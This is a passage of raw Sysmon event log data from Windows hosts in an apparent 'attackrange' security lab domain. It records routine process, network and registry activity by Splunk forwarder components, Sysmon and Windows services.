Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103750Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:59.589{58E9C193-B29F-615A-D501-00000000FC01}104C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103749Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:59.542{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4D13964968E659FCABE9F9030B01754,SHA256=F7A8B2B8F23C467A6E13EAB7457F2519D6A443ADAEF9A9866633B79E30E9B5AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081645Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:59.310{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D14441EB4E28ECF954F2ED914EDB2418,SHA256=E7B8F612C6F20021D75CB9618B11DCD9598AB0766A1B6B270C33CCFD88661CED,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103748Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:58.262{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49546-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000103747Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:58.262{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49546-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000103746Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:57.465{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49545-false10.0.1.12-8000- 354300x8000000000000000103745Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:57.074{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49544-false10.0.1.12-8089- 23542300x8000000000000000103744Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:59.026{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=968EC11F20CB3227C321200F2EEE5921,SHA256=22FBA5D9A08AA8E9A54648E75E431FE508C26C0B710377A70420F9076C4CF6A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103743Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:51:59.026{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD47A91835EBBF9272933CCDFEE23FC8,SHA256=A572D55CBCEB7A5C15A65202377D8D8BA8E63A3CEDC57D6111B8AF66AF982580,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081644Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:51:59.157{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-025MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103768Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:00.620{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=968EC11F20CB3227C321200F2EEE5921,SHA256=22FBA5D9A08AA8E9A54648E75E431FE508C26C0B710377A70420F9076C4CF6A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103767Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:00.542{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32DF11B12B79B7D180CEA4A7BDC386F9,SHA256=DBFE55D135FC02979534572138A4A3821CA513089E1B394D714F5943B7005126,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081648Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:00.312{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=687DE105D9F76B6BC02BA521822C4867,SHA256=6B4DD2144CFF5AB46AC551F4510658233150ED22E7F64CBD7A1815F130462171,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103766Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:00.510{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B2A0-615A-D601-00000000FC01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103765Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:00.510{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103764Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:00.510{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103763Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:00.510{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103762Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:00.510{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103761Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:00.510{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B2A0-615A-D601-00000000FC01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103760Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:00.510{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B2A0-615A-D601-00000000FC01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103759Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:00.511{58E9C193-B2A0-615A-D601-00000000FC01}6740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081647Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:00.187{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62E3FBF5C5FE72E2BE4D35127A90E962,SHA256=7646A23B6F64B8A2F8C191DA8D1CCDAB79DE08A5C41A1B7BB5C88DA9B0D6F964,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081646Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:00.187{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CF5FBBDA9C00A67AE3D971F223772E0E,SHA256=35BF4F300AA02D8CC5518CFE07D102E86432BAE6FE45D4E9BA1B0CFA91EB3B79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103772Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:01.604{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=766194F709CFA949D5911D6BD87C55E0,SHA256=A2829F769E3C29B6284B3DBA57C6949F40AA391460F26FC35166D49D5027BEA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081649Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:01.312{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5696C00E94ECFBF51DFAB969B59D305C,SHA256=57E1EEB776C3DF3E58D6F2E8CECA281818CE98BA26AC22196B35BA7B47EF27DD,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000103771Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:52:01.167{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\8EFF07E0-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_8EFF07E0-0000-0000-0000-100000000000.XML 13241300x8000000000000000103770Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:52:01.167{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\4D264F37-7FD1-4957-AA29-D51476710399\Config SourceDWORD (0x00000001) 13241300x8000000000000000103769Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 07:52:01.167{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\4D264F37-7FD1-4957-AA29-D51476710399\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_4D264F37-7FD1-4957-AA29-D51476710399.XML 23542300x800000000000000081650Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:02.312{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ADCB1B6810CF3DC4582E0DC70A8D61F,SHA256=3D18983333EE76A3B6653E317FA810287A4752FE0050414D1EE78BC714AB776B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103787Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:02.651{58E9C193-B2A2-615A-D701-00000000FC01}43245872C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103786Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:02.620{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9ADB7C4A9B655B85A9410CD14139F69,SHA256=A59979D6C1BE6047DA493B384328956CA437E73B35635AA1E6E070A062619015,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000103785Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:01.409{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49548-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000103784Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:01.409{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49548-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000103783Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:01.388{58E9C193-ACA7-615A-0D00-00000000FC01}896C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49547-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local135epmap 354300x8000000000000000103782Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:01.388{58E9C193-ACB4-615A-2E00-00000000FC01}1716C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49547-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local135epmap 10341000x8000000000000000103781Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:02.260{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B2A2-615A-D701-00000000FC01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103780Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:02.260{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103779Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:02.260{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103778Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:02.260{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103777Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:02.260{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 